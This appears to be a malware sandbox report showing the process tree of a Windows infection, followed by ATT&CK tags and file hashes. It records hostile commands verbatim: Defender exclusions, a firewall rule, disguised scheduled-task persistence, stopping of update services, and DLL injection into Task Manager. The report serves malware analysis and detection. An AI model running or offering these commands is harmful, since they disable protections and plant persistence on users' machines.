C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:16⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:16⤵PID:6140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:16⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1896 /prefetch:26⤵PID:5248
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/5⤵PID:4748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d747186⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,5664680323046763604,9677910988212657655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:36⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,5664680323046763604,9677910988212657655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:26⤵PID:5060
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\43DA.exeC:\Users\Admin\AppData\Local\Temp\43DA.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tN1mE9TX.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tN1mE9TX.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6032 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vC6cO6Ik.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vC6cO6Ik.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4532 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Wj5od8jc.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Wj5od8jc.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dk2qX3md.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dk2qX3md.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6072 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Qi55hp5.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Qi55hp5.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5148 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:2372
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:4760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 2049⤵
- Program crash
PID:4944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2AB154Bn.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2AB154Bn.exe7⤵
- Executes dropped EXE
PID:3560
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44A6.exeC:\Users\Admin\AppData\Local\Temp\44A6.exe2⤵
- Executes dropped EXE
PID:3972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\463D.bat" "2⤵PID:6100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login3⤵PID:5484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d747184⤵PID:5952
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/3⤵
- Executes dropped EXE
PID:5144 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d747184⤵PID:5808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\470A.exeC:\Users\Admin\AppData\Local\Temp\470A.exe2⤵
- Executes dropped EXE
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\4891.exeC:\Users\Admin\AppData\Local\Temp\4891.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\4A77.exeC:\Users\Admin\AppData\Local\Temp\4A77.exe2⤵
- Executes dropped EXE
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\4C4C.exeC:\Users\Admin\AppData\Local\Temp\4C4C.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Users\Admin\AppData\Local\Temp\7DAE.exeC:\Users\Admin\AppData\Local\Temp\7DAE.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5924 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:5772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3696
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1944
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:572
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5960
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2972
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5972
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1808
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:4536
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1724
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5008 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:5540
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4372
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos4.exe"C:\Users\Admin\AppData\Local\Temp\kos4.exe"3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
PID:3736 -
C:\Users\Admin\AppData\Local\Temp\is-MK6NS.tmp\LzmwAqmV.tmp"C:\Users\Admin\AppData\Local\Temp\is-MK6NS.tmp\LzmwAqmV.tmp" /SL5="$D0206,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1032 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"6⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
-
C:\Program Files (x86)\Drive Tools\zDriveTools.exe"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i6⤵
- Executes dropped EXE
PID:6128
-
-
C:\Program Files (x86)\Drive Tools\zDriveTools.exe"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s6⤵
- Executes dropped EXE
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:4660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2308
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FD2.exeC:\Users\Admin\AppData\Local\Temp\7FD2.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\81E6.exeC:\Users\Admin\AppData\Local\Temp\81E6.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 7963⤵
- Program crash
PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\906E.exeC:\Users\Admin\AppData\Local\Temp\906E.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 5724⤵
- Program crash
PID:224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D383.exeC:\Users\Admin\AppData\Local\Temp\D383.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3852 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:5620
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4060
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5204
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5380
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5824
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3972
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:456
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:6020
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5168
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4756
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1724
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4292
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1296
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1632
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1972
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5560
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5912
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:868
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5524
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5976
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3956
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:224
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1408
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Modifies data under HKEY_USERS
PID:3760
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4584
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 884 -ip 8841⤵PID:4148
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:5144
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4760 -ip 47601⤵PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3660 -ip 36601⤵PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3632 -ip 36321⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:2136
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:1040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4296
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
PID:5876
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:5976
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
152B
MD516e56f576d6ace85337e8c07ec00c0bf
SHA15c9579bb4975c93a69d1336eed5f05013dc35b9c
SHA2567796a7ba79148fc3cb46e4bbca48094376371ca9dd66f0810f7797c5e24158f5
SHA51269e89f39fa6438a74a48985387cd2e3e003858b0855ee6cd03abf6967674503b98b90573c784b4cf785b9cca594d3c8762f92def24e2bf51374ef5a00921e5e2
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD516e56f576d6ace85337e8c07ec00c0bf
SHA15c9579bb4975c93a69d1336eed5f05013dc35b9c
SHA2567796a7ba79148fc3cb46e4bbca48094376371ca9dd66f0810f7797c5e24158f5
SHA51269e89f39fa6438a74a48985387cd2e3e003858b0855ee6cd03abf6967674503b98b90573c784b4cf785b9cca594d3c8762f92def24e2bf51374ef5a00921e5e2
-
